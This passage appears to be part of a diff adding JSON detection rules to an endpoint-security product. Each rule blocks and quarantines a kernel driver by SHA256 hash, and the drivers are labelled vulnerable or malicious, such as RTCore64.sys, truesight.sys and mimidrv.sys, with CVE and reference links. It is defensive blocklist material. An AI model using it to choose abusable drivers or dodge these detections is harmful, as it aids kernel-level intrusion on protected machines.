+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "db1dbb09d437d3e8bed08c88ca43769b4fe8728f68b78ff6f9c8d2557e28d2b1",
+ "comment": "Vulnerable Kernel Driver (aka netfilter2.sys) [https://www.loldrivers.io/drivers/5ad8a3b6-6d20-4c95-8fa7-9a507167ba3c/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "185f5d80-f41c-5061-93df-721f71c369d4",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.619054Z",
+ "creation_date": "2026-03-23T11:45:29.619056Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.619062Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "b1b708dd7b10616693fd6b56e0b47d9fa6b90f9db28cbf3893b815222e2fa2e5",
+ "comment": "NVIDIA vulnerable flash tool (aka nvflash.sys nd nvflsh64.sys) [CVE-2019-5688] [https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "18759823-b744-5986-874d-9db2951e6aed",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.615434Z",
+ "creation_date": "2026-03-23T11:45:29.615436Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.615441Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "7fa5c326b294f4fc537207a27947c2fcbbfa4eabde1ba4727c92cd8613e0fc7f",
+ "comment": "MICRO-STAR vulnerable drivers (aka NBIOLib_X64.sys, NTIOLib_X64.sys, NTIOLib.sys and NBIOLib.sys) [CVE-2021-44899] [http://blog.rewolf.pl/blog/?p=1630] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "1875b6fb-099c-5b12-a371-719047524fd8",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.150194Z",
+ "creation_date": "2026-03-23T11:45:31.150196Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.150201Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "198ad963612c57f44158156a0142cc607d867fc7d478a0aaf711d0bdd131e2db",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "18867532-5a88-5a89-a010-a7db15a44a80",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.975992Z",
+ "creation_date": "2026-03-23T11:45:29.975994Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.975999Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "3a9e1d17beeb514f1b9b3bacaee7420285de5cbdce89c5319a992c6cbd1de138",
+ "comment": "SystemInformer driver (aka systeminformer.sys, formerly known as kprocesshacker.sys) [https://github.com/winsiderss/systeminformer] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "188c4aef-614b-503e-8a62-2505f8dfc3ce",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.485135Z",
+ "creation_date": "2026-03-23T11:45:31.485138Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.485147Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "1e1a8f5f9657c32d55a36cae3071dd874b0504f645d37e633d65a313192075ee",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "188c502e-fe31-584d-9125-47d31962df38",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.153942Z",
+ "creation_date": "2026-03-23T11:45:31.153944Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.153958Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "1d70eb4feb73020f17d62933062b0bdb47aa2e236f868c2f2beb492810811f24",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "188d63e0-66f7-5911-aab0-fa797b425113",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:32.145318Z",
+ "creation_date": "2026-03-23T11:45:32.145321Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:32.145329Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "507b07b0dc0e638b65b4a4d11a462b35439c746d42337b9888927bf994176102",
+ "comment": "Vulnerable Kernel Driver (aka SeasunProtect.sys) [https://www.loldrivers.io/drivers/3a9ea9a6-e5e3-439a-b892-1f78dd990099/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "1893c7d6-1896-5c6b-9f9c-7d87295dddfe",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.453753Z",
+ "creation_date": "2026-03-23T11:45:30.453757Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.453766Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "b40db5bb6a76ca9aed98366dc19f0c31c50b3f0ac96e0f615e4c52abb6bb0cde",
+ "comment": "Vulnerable Kernel Driver (aka nicm.sys) [https://www.loldrivers.io/drivers/86cff0de-2536-4b8d-a846-a7312c569597/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "189ae851-081f-50bb-b7c1-ec5ff0f47672",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.982818Z",
+ "creation_date": "2026-03-23T11:45:29.982821Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.982826Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "c60fcff9c8e5243bbb22ec94618b9dcb02c59bb49b90c04d7d6ab3ebbd58dc3a",
+ "comment": "Vulnerable Kernel Driver (aka ProxyDrv.sys) [https://www.loldrivers.io/drivers/0e3b0052-18c7-4c8b-a064-a1332df07af2/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "189d3e7e-3e66-5788-a2e8-55d558a5de9c",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.816302Z",
+ "creation_date": "2026-03-23T11:45:30.816304Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.816309Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "5fae7e491b0d919f0b551e15e0942ac7772f2889722684aea32cff369e975879",
+ "comment": "Vulnerable Kernel Driver (aka ngiodriver.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "18a4d7e9-4210-500b-ab17-7ad4c85fd9bf",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.610405Z",
+ "creation_date": "2026-03-23T11:45:29.610407Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.610413Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "4d19ee789e101e5a76834fb411aadf8229f08b3ece671343ad57a6576a525036",
+ "comment": "CPUID CPU-Z vulnerable driver (aka cpuz143_x64.sys) [CVE-2017-15302] [https://www.loldrivers.io/drivers/de003542-80e1-4aa0-9b99-ed8647a93a6e/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "18a75389-90d1-528a-ae72-23353bc13875",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.470922Z",
+ "creation_date": "2026-03-23T11:45:30.470926Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.470935Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "683936955d7e3281573fcbaa149fc384a06dc4a12cd67ce601aba2f1a32b19c3",
+ "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "18a87291-bce2-5380-974e-a892e7d75199",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.821051Z",
+ "creation_date": "2026-03-23T11:45:31.821054Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.821062Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "d67133fb200fb009235f10e7f87674f627c65d1320b63d22dff10dc9efe00e41",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "18aa80c8-228a-5db4-84b2-164dab9da9dd",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.815629Z",
+ "creation_date": "2026-03-23T11:45:30.815632Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.815638Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "0f30ecd4faec147a2335a4fc031c8a1ac9310c35339ebeb651eb1429421951a0",
+ "comment": "Vulnerable Kernel Driver (aka RadHwMgr.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "18b8d519-5e8c-54c5-82cf-ab7ab90f922d",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.460350Z",
+ "creation_date": "2026-03-23T11:45:30.460354Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.460362Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "613d6cc154586c21b330018142a89eac4504e185f0be7f86af975e5b6c046c55",
+ "comment": "Vulnerable Kernel Driver (aka RTCore64.sys) [https://www.loldrivers.io/drivers/e32bc3da-4db1-4858-a62c-6fbe4db6afbd/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "18c67298-9ca1-5c9a-8409-b253515f4e81",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.615640Z",
+ "creation_date": "2026-03-23T11:45:29.615642Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.615648Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "eae8045d43f16e33232fd8bd2399f48b14f8a6391c9fffe38960c03fee978b27",
+ "comment": "MICRO-STAR vulnerable drivers (aka NBIOLib_X64.sys, NTIOLib_X64.sys, NTIOLib.sys and NBIOLib.sys) [CVE-2021-44899] [http://blog.rewolf.pl/blog/?p=1630] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "18e872fd-a45a-5812-941d-2608f99a740e",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.491984Z",
+ "creation_date": "2026-03-23T11:45:31.491986Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.491991Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "e63fe1bfbbc1b8fade1fd13bac1504a82c5846a8abd9359ce90b6e0fecbbb7aa",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "18eb6bf7-4b88-5622-9bd5-285a92b073f9",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.819140Z",
+ "creation_date": "2026-03-23T11:45:30.819142Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.819148Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "ac7cd788581d6f8098b5d438546eb3584c1b08dbe7fd3b1ddc2a7295bd4dd16f",
+ "comment": "Vulnerable Kernel Driver (aka kerneld.amd64) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "18f07e05-d597-5181-8e27-2732a91f055e",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.832443Z",
+ "creation_date": "2026-03-23T11:45:30.832445Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.832451Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "a785bd53993312166463fd39b61d610cb304376d73846318646c54d34896f952",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "190daa73-097a-5f4e-97f5-d5b33f87e3ac",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.980585Z",
+ "creation_date": "2026-03-23T11:45:29.980587Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.980592Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "e269b4cb9df863c31ae13012429f67a0f3cd81481025d35ce6531b33b63b5976",
+ "comment": "Vulnerable Kernel Driver (aka rzpnk.sys) [https://www.loldrivers.io/drivers/1c6e1d3b-f825-4065-9e0c-83386883e40f/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "1911593b-bfe5-5daf-9db9-204c3f44a6e8",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.473325Z",
+ "creation_date": "2026-03-23T11:45:31.473329Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.473338Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "fef2b46b8a2ac3dd99373b45b3c55ebac2f87cd4b43ca5de2e06cfe88602431d",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "19147c82-4285-569b-a634-5a13bf016abc",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.975497Z",
+ "creation_date": "2026-03-23T11:45:29.975500Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.975506Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "45799bfaea64e065a9b0c97f9f10f42c830d26e55fdcb354e39179d0993e9c7d",
